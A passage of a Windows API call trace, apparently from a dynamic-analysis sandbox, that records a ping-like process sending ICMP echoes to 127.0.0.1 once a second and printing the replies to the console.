[0051.556] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0051.556] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xfb8940 [0051.556] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0xfb8940, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0051.556] _fileno (_File=0x76ea4c28) returned 1 [0051.556] _write (in: _FileHandle=1, _Buf=0xfb8940*, _MaxCharCount=0x9 | out: _Buf=0xfb8940*) returned 9 [0051.556] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0051.556] _fileno (_File=0x76ea4c28) returned 1 [0051.556] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0051.556] LocalFree (hMem=0xfb8940) returned 0x0 [0051.556] LocalFree (hMem=0xfc7fa0) returned 0x0 [0051.556] Sleep (dwMilliseconds=0x3e8) [0052.569] IcmpSendEcho2Ex (in: IcmpHandle=0xfb6bb8, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0xfbc340, RequestSize=0x20, RequestOptions=0xf3f074, ReplyBuffer=0xfc5270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0xfc5270) returned 0x1 [0052.570] InetNtopW (in: Family=2, pAddr=0xf3f064, pStringBuf=0xf3f18c, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0052.570] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xf3eff8, nSize=0x0, Arguments=0xf3eff4 | out: lpBuffer="羠ü杻ó⛔\x94䰨盪✣") returned 0x16 [0052.570] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0052.570] _fileno (_File=0x76ea4c28) returned 1 [0052.570] _get_osfhandle (_FileHandle=1) returned 0x28 [0052.570] GetFileType (hFile=0x28) returned 0x2 [0052.570] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xf3efbc | out: lpMode=0xf3efbc) returned 0 [0052.570] GetLastError () returned 0x6 [0052.570] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xf3ef20, nSize=0x50 | out: lpBuffer="ó✣") returned 0x0 [0052.570] _fileno (_File=0x76ea4c28) returned 1 [0052.570] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0052.570] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0052.570] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0xfc7fd8 [0052.570] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0xfc7fd8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0052.570] _fileno (_File=0x76ea4c28) returned 1 [0052.570] _write (in: _FileHandle=1, _Buf=0xfc7fd8*, _MaxCharCount=0x16 | out: _Buf=0xfc7fd8*) returned 22 [0052.570] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0052.570] _fileno (_File=0x76ea4c28) returned 1 [0052.570] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0052.570] LocalFree (hMem=0xfc7fd8) returned 0x0 [0052.570] LocalFree (hMem=0xfc7fa0) returned 0x0 [0052.570] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0xf3eff8, nSize=0x0, Arguments=0xf3eff4 | out: lpBuffer="羠ü杻ó⛿\x94䰨盪✼") returned 0x9 [0052.570] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0052.570] _fileno (_File=0x76ea4c28) returned 1 [0052.570] _get_osfhandle (_FileHandle=1) returned 0x28 [0052.570] GetFileType (hFile=0x28) returned 0x2 [0052.570] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xf3efbc | out: lpMode=0xf3efbc) returned 0 [0052.570] GetLastError () returned 0x6 [0052.570] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xf3ef20, nSize=0x50 | out: lpBuffer="ó✼") returned 0x0 [0052.570] _fileno (_File=0x76ea4c28) returned 1 [0052.571] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0052.571] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0052.571] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xfb8a18 [0052.571] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0xfb8a18, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0052.571] _fileno (_File=0x76ea4c28) returned 1 [0052.571] _write (in: _FileHandle=1, _Buf=0xfb8a18*, _MaxCharCount=0x9 | out: _Buf=0xfb8a18*) returned 9 [0052.571] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0052.571] _fileno (_File=0x76ea4c28) returned 1 [0052.571] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0052.571] LocalFree (hMem=0xfb8a18) returned 0x0 [0052.571] LocalFree (hMem=0xfc7fa0) returned 0x0 [0052.571] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xf3effc, nSize=0x0, Arguments=0xf3eff8 | out: lpBuffer="羠ü杻ó➷\x94䰨盪✧") returned 0x9 [0052.571] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0052.571] _fileno (_File=0x76ea4c28) returned 1 [0052.571] _get_osfhandle (_FileHandle=1) returned 0x28 [0052.571] GetFileType (hFile=0x28) returned 0x2 [0052.571] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xf3efc0 | out: lpMode=0xf3efc0) returned 0 [0052.571] GetLastError () returned 0x6 [0052.571] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xf3ef24, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0052.571] _fileno (_File=0x76ea4c28) returned 1 [0052.571] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0052.571] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0052.571] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xfb8a60 [0052.571] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0xfb8a60, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0052.571] _fileno (_File=0x76ea4c28) returned 1 [0052.571] _write (in: _FileHandle=1, _Buf=0xfb8a60*, _MaxCharCount=0x9 | out: _Buf=0xfb8a60*) returned 9 [0052.571] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0052.571] _fileno (_File=0x76ea4c28) returned 1 [0052.571] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0052.571] LocalFree (hMem=0xfb8a60) returned 0x0 [0052.571] LocalFree (hMem=0xfc7fa0) returned 0x0 [0052.571] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0xf3eff8, nSize=0x0, Arguments=0xf3eff4 | out: lpBuffer="羠ü杻ó⟘\x94䰨盪✨") returned 0x9 [0052.571] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0052.571] _fileno (_File=0x76ea4c28) returned 1 [0052.571] _get_osfhandle (_FileHandle=1) returned 0x28 [0052.571] GetFileType (hFile=0x28) returned 0x2 [0052.571] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xf3efbc | out: lpMode=0xf3efbc) returned 0 [0052.571] GetLastError () returned 0x6 [0052.571] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xf3ef20, nSize=0x50 | out: lpBuffer="ó✨") returned 0x0 [0052.571] _fileno (_File=0x76ea4c28) returned 1 [0052.571] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0052.571] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0052.571] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xfb8940 [0052.571] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0xfb8940, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0052.571] _fileno (_File=0x76ea4c28) returned 1 [0052.571] _write (in: _FileHandle=1, _Buf=0xfb8940*, _MaxCharCount=0x9 | out: _Buf=0xfb8940*) returned 9 [0052.571] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0052.571] _fileno (_File=0x76ea4c28) returned 1 [0052.571] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0052.571] LocalFree (hMem=0xfb8940) returned 0x0 [0052.571] LocalFree (hMem=0xfc7fa0) returned 0x0 [0052.571] Sleep (dwMilliseconds=0x3e8) [0053.585] IcmpSendEcho2Ex (in: IcmpHandle=0xfb6bb8, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0xfbc340, RequestSize=0x20, RequestOptions=0xf3f074, ReplyBuffer=0xfc5270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0xfc5270) returned 0x1 [0053.586] InetNtopW (in: Family=2, pAddr=0xf3f064, pStringBuf=0xf3f18c, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0053.586] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xf3eff8, nSize=0x0, Arguments=0xf3eff4 | out: lpBuffer="羠ü杻ó⛔\x94䰨盪✣") returned 0x16 [0053.586] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0053.586] _fileno (_File=0x76ea4c28) returned 1 [0053.586] _get_osfhandle (_FileHandle=1) returned 0x28 [0053.586] GetFileType (hFile=0x28) returned 0x2 [0053.586] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xf3efbc | out: lpMode=0xf3efbc) returned 0 [0053.587] GetLastError () returned 0x6 [0053.587] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xf3ef20, nSize=0x50 | out: lpBuffer="ó✣") returned 0x0 [0053.587] _fileno (_File=0x76ea4c28) returned 1 [0053.587] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0053.587] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0053.587] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0xfc7fd8 [0053.587] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0xfc7fd8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0053.587] _fileno (_File=0x76ea4c28) returned 1 [0053.587] _write (in: _FileHandle=1, _Buf=0xfc7fd8*, _MaxCharCount=0x16 | out: _Buf=0xfc7fd8*) returned 22 [0053.587] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0053.587] _fileno (_File=0x76ea4c28) returned 1 [0053.587] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0053.587] LocalFree (hMem=0xfc7fd8) returned 0x0 [0053.587] LocalFree (hMem=0xfc7fa0) returned 0x0 [0053.587] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0xf3eff8, nSize=0x0, Arguments=0xf3eff4 | out: lpBuffer="羠ü杻ó⛿\x94䰨盪✼") returned 0x9 [0053.587] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0053.587] _fileno (_File=0x76ea4c28) returned 1 [0053.587] _get_osfhandle (_FileHandle=1) returned 0x28 [0053.587] GetFileType (hFile=0x28) returned 0x2 [0053.587] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xf3efbc | out: lpMode=0xf3efbc) returned 0 [0053.587] GetLastError () returned 0x6 [0053.587] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xf3ef20, nSize=0x50 | out: lpBuffer="ó✼") returned 0x0 [0053.587] _fileno (_File=0x76ea4c28) returned 1 [0053.587] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0053.587] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0053.587] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xfb89a0 [0053.587] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0xfb89a0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0053.587] _fileno (_File=0x76ea4c28) returned 1 [0053.587] _write (in: _FileHandle=1, _Buf=0xfb89a0*, _MaxCharCount=0x9 | out: _Buf=0xfb89a0*) returned 9 [0053.587] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0053.587] _fileno (_File=0x76ea4c28) returned 1 [0053.587] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0053.587] LocalFree (hMem=0xfb89a0) returned 0x0 [0053.587] LocalFree (hMem=0xfc7fa0) returned 0x0 [0053.587] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xf3effc, nSize=0x0, Arguments=0xf3eff8 | out: lpBuffer="羠ü杻ó➷\x94䰨盪✧") returned 0x9 [0053.587] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0053.587] _fileno (_File=0x76ea4c28) returned 1 [0053.587] _get_osfhandle (_FileHandle=1) returned 0x28 [0053.587] GetFileType (hFile=0x28) returned 0x2 [0053.588] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xf3efc0 | out: lpMode=0xf3efc0) returned 0 [0053.588] GetLastError () returned 0x6 [0053.588] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xf3ef24, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0053.588] _fileno (_File=0x76ea4c28) returned 1 [0053.588] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0053.588] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0053.588] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xfb8a18 [0053.588] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0xfb8a18, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0053.588] _fileno (_File=0x76ea4c28) returned 1 [0053.588] _write (in: _FileHandle=1, _Buf=0xfb8a18*, _MaxCharCount=0x9 | out: _Buf=0xfb8a18*) returned 9 [0053.588] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0053.588] _fileno (_File=0x76ea4c28) returned 1 [0053.588] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0053.588] LocalFree (hMem=0xfb8a18) returned 0x0 [0053.588] LocalFree (hMem=0xfc7fa0) returned 0x0 [0053.588] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0xf3eff8, nSize=0x0, Arguments=0xf3eff4 | out: lpBuffer="羠ü杻ó⟘\x94䰨盪✨") returned 0x9 [0053.588] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0053.588] _fileno (_File=0x76ea4c28) returned 1 [0053.588] _get_osfhandle (_FileHandle=1) returned 0x28 [0053.588] GetFileType (hFile=0x28) returned 0x2 [0053.588] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xf3efbc | out: lpMode=0xf3efbc) returned 0 [0053.588] GetLastError () returned 0x6 [0053.588] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xf3ef20, nSize=0x50 | out: lpBuffer="ó✨") returned 0x0 [0053.588] _fileno (_File=0x76ea4c28) returned 1 [0053.588] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0053.588] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0053.588] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xfb8a30 [0053.588] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0xfb8a30, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0053.588] _fileno (_File=0x76ea4c28) returned 1 [0053.588] _write (in: _FileHandle=1, _Buf=0xfb8a30*, _MaxCharCount=0x9 | out: _Buf=0xfb8a30*) returned 9 [0053.588] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0053.588] _fileno (_File=0x76ea4c28) returned 1 [0053.588] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0053.588] LocalFree (hMem=0xfb8a30) returned 0x0 [0053.588] LocalFree (hMem=0xfc7fa0) returned 0x0 [0053.588] Sleep (dwMilliseconds=0x3e8) [0054.595] IcmpSendEcho2Ex (in: IcmpHandle=0xfb6bb8, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0xfbc340, RequestSize=0x20, RequestOptions=0xf3f074, ReplyBuffer=0xfc5270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0xfc5270) returned 0x1 [0054.595] InetNtopW (in: Family=2, pAddr=0xf3f064, pStringBuf=0xf3f18c, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0054.595] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xf3eff8, nSize=0x0, Arguments=0xf3eff4 | out: lpBuffer="羠ü杻ó⛔\x94䰨盪✣") returned 0x16 [0054.595] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0054.595] _fileno (_File=0x76ea4c28) returned 1 [0054.595] _get_osfhandle (_FileHandle=1) returned 0x28 [0054.595] GetFileType (hFile=0x28) returned 0x2 [0054.595] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xf3efbc | out: lpMode=0xf3efbc) returned 0 [0054.595] GetLastError () returned 0x6 [0054.595] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xf3ef20, nSize=0x50 | out: lpBuffer="ó✣") returned 0x0 [0054.596] _fileno (_File=0x76ea4c28) returned 1 [0054.596] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0054.596] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0054.596] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0xfc7fd8 [0054.596] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0xfc7fd8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0054.596] _fileno (_File=0x76ea4c28) returned 1 [0054.596] _write (in: _FileHandle=1, _Buf=0xfc7fd8*, _MaxCharCount=0x16 | out: _Buf=0xfc7fd8*) returned 22 [0054.596] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0054.596] _fileno (_File=0x76ea4c28) returned 1 [0054.596] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0054.596] LocalFree (hMem=0xfc7fd8) returned 0x0 [0054.596] LocalFree (hMem=0xfc7fa0) returned 0x0 [0054.596] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0xf3eff8, nSize=0x0, Arguments=0xf3eff4 | out: lpBuffer="羠ü杻ó⛿\x94䰨盪✼") returned 0x9 [0054.596] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0054.596] _fileno (_File=0x76ea4c28) returned 1 [0054.596] _get_osfhandle (_FileHandle=1) returned 0x28 [0054.596] GetFileType (hFile=0x28) returned 0x2 [0054.596] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xf3efbc | out: lpMode=0xf3efbc) returned 0 [0054.596] GetLastError () returned 0x6 [0054.596] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xf3ef20, nSize=0x50 | out: lpBuffer="ó✼") returned 0x0 [0054.596] _fileno (_File=0x76ea4c28) returned 1 [0054.596] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0054.596] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0054.596] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xfb8a18 [0054.596] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0xfb8a18, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0054.596] _fileno (_File=0x76ea4c28) returned 1 [0054.596] _write (in: _FileHandle=1, _Buf=0xfb8a18*, _MaxCharCount=0x9 | out: _Buf=0xfb8a18*) returned 9 [0054.596] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0054.596] _fileno (_File=0x76ea4c28) returned 1 [0054.596] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0054.596] LocalFree (hMem=0xfb8a18) returned 0x0 [0054.596] LocalFree (hMem=0xfc7fa0) returned 0x0 [0054.596] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xf3effc, nSize=0x0, Arguments=0xf3eff8 | out: lpBuffer="羠ü杻ó➷\x94䰨盪✧") returned 0x9 [0054.596] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0054.596] _fileno (_File=0x76ea4c28) returned 1 [0054.596] _get_osfhandle (_FileHandle=1) returned 0x28 [0054.596] GetFileType (hFile=0x28) returned 0x2 [0054.596] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xf3efc0 | out: lpMode=0xf3efc0) returned 0 [0054.596] GetLastError () returned 0x6 [0054.596] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xf3ef24, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0054.596] _fileno (_File=0x76ea4c28) returned 1 [0054.596] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0054.596] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0054.596] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xfb8940 [0054.596] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0xfb8940, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0054.596] _fileno (_File=0x76ea4c28) returned 1 [0054.596] _write (in: _FileHandle=1, _Buf=0xfb8940*, _MaxCharCount=0x9 | out: _Buf=0xfb8940*) returned 9 [0054.596] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0054.596] _fileno (_File=0x76ea4c28) returned 1 [0054.596] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0054.596] LocalFree (hMem=0xfb8940) returned 0x0 [0054.597] LocalFree (hMem=0xfc7fa0) returned 0x0 [0054.597] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0xf3eff8, nSize=0x0, Arguments=0xf3eff4 | out: lpBuffer="羠ü杻ó⟘\x94䰨盪✨") returned 0x9 [0054.597] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0054.597] _fileno (_File=0x76ea4c28) returned 1 [0054.597] _get_osfhandle (_FileHandle=1) returned 0x28 [0054.597] GetFileType (hFile=0x28) returned 0x2 [0054.597] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xf3efbc | out: lpMode=0xf3efbc) returned 0 [0054.597] GetLastError () returned 0x6 [0054.597] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xf3ef20, nSize=0x50 | out: lpBuffer="ó✨") returned 0x0 [0054.597] _fileno (_File=0x76ea4c28) returned 1 [0054.597] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0054.597] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0054.597] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xfb8940 [0054.597] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0xfb8940, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0054.597] _fileno (_File=0x76ea4c28) returned 1 [0054.597] _write (in: _FileHandle=1, _Buf=0xfb8940*, _MaxCharCount=0x9 | out: _Buf=0xfb8940*) returned 9 [0054.597] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0054.597] _fileno (_File=0x76ea4c28) returned 1 [0054.597] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0054.597] LocalFree (hMem=0xfb8940) returned 0x0 [0054.597] LocalFree (hMem=0xfc7fa0) returned 0x0 